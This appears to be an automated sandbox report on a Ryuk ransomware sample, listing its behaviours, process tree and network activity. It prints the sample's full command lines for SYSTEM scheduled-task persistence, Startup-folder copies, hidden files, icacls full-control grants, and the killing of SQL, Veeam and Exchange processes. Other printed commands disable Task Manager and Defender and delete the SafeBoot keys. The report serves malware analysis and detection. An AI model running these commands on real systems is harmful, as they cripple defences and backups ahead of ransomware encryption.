File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected].[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2124 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 2904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2360 wrote to memory of 2904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2360 wrote to memory of 2904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2124 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 716 wrote to memory of 4428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 716 wrote to memory of 4428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 716 wrote to memory of 4428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2124 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 116 wrote to memory of 4504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 116 wrote to memory of 4504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 116 wrote to memory of 4504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2124 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1548 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1548 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1548 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2124 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 792 wrote to memory of 4000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 792 wrote to memory of 4000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 792 wrote to memory of 4000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2124 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 3412 wrote to memory of 4580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3412 wrote to memory of 4580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3412 wrote to memory of 4580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2124 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 5004 wrote to memory of 4788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 5004 wrote to memory of 4788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 5004 wrote to memory of 4788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2124 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 4036 wrote to memory of 5072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4036 wrote to memory of 5072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4036 wrote to memory of 5072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 4616 wrote to memory of 4308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4616 wrote to memory of 4308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4616 wrote to memory of 4308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4616 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe

"C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\SysWOW64\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

Network

Country Destination Domain Proto
US 8.8.8.8:53 14.110.152.52.in-addr.arpa udp
US 52.152.110.14:443 tcp
US 52.152.110.14:443 tcp
US 8.8.8.8:53 97.97.242.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
N/A 10.127.0.1:445 tcp
DE 167.235.102.93:445 tcp
DE 167.235.102.93:139 tcp
N/A 10.127.0.1:139 tcp
US 8.8.8.8:53 133.17.126.40.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 2.36.159.162.in-addr.arpa udp
US 8.8.8.8:53 226.101.242.52.in-addr.arpa udp
US 8.8.8.8:53 240.232.229.192.in-addr.arpa udp
